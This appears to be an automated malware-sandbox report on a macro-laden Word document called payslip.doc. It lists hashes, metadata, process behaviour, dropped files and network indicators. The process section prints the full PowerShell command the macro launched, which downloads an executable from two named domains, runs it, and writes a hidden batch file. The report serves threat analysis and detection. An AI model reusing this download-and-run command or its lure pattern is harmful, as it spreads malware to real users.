analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

payslip.doc

Full analysis: https://app.any.run/tasks/040d599c-8c82-471c-a879-21797a42cefe
Verdict: Malicious activity
Analysis date: November 15, 2018, 14:50:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: user, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Nov 15 13:11:00 2018, Last Saved Time/Date: Thu Nov 15 13:12:00 2018, Number of Pages: 1, Number of Words: 18, Number of Characters: 108, Security: 0
MD5:

6715F77143D45CD1286D1B7A0AD9BEF7

SHA1:

183AA33BE25EA44B4E29757A45846EFA64A6CD91

SHA256:

2CBB0ED6FF901B6B54B497AC6540ABBC32E9365D59EC95FD37B700BC8FD28946

SSDEEP:

384:sEt1XesnEGlGeB50+0ky0NGoGFRP9K/rVXDcxcQ1yGcS2rdy5ujtMImCeX0jOR4Q:s1sCCr2yrTqISdDANspkKrag2VpE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2916)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3044)
      • cmd.exe (PID: 2648)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2916)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3656)
    • Creates files in the user directory

      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 3656)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2916)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 125
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 108
Words: 18
Pages: 1
ModifyDate: 2018:11:15 13:12:00
CreateDate: 2018:11:15 13:11:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: user
Template: Normal
Comments: -
Keywords: -
Author: Enpor Support
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\payslip.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2648cmd /c powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''%tmp%\tmp802.exe'');<#last info#>start-process ''%tmp%\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp343.bat; start-process '%tmp%\tmp343.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3656powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''C:\Users\admin\AppData\Local\Temp\tmp802.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp343.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp343.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3044cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp343.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3836powershell "<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,'C:\Users\admin\AppData\Local\Temp\tmp802.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp802.exe';}try{waitdone('http://movingmountainsfoods.com/huer.buer')}catch{waitdone('http://bomanforklift.com/huer.buer')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 945
Read events
1 412
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA93B.tmp.cvr
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF329E9F3A19D6654E.TMP
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA0B2A02CD16DD9D7.TMP
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB77B65DE71E9A704.TMP
MD5:
SHA256:
3656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5LSZDQXK6DLP1OJHYMY8.temp
MD5:
SHA256:
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LMENLE7UHA28UYA1AYY5.temp
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:85283E8C73AC10A255BBE4286BF1BDB3
SHA256:0020F0707504300A48B9B083CDF48B2783CA33CFEDF40EFB79F861241E0A6BF5
3656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db68a.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dbb5c.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3836
powershell.exe
GET
301
213.129.84.120:80
http://movingmountainsfoods.com/huer.buer
GB
html
250 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3836
powershell.exe
213.129.84.120:443
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
3836
powershell.exe
213.129.84.120:80
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious

DNS requests

Domain
IP
Reputation
movingmountainsfoods.com
  • 213.129.84.120
malicious

Threats

No threats detected
No debug info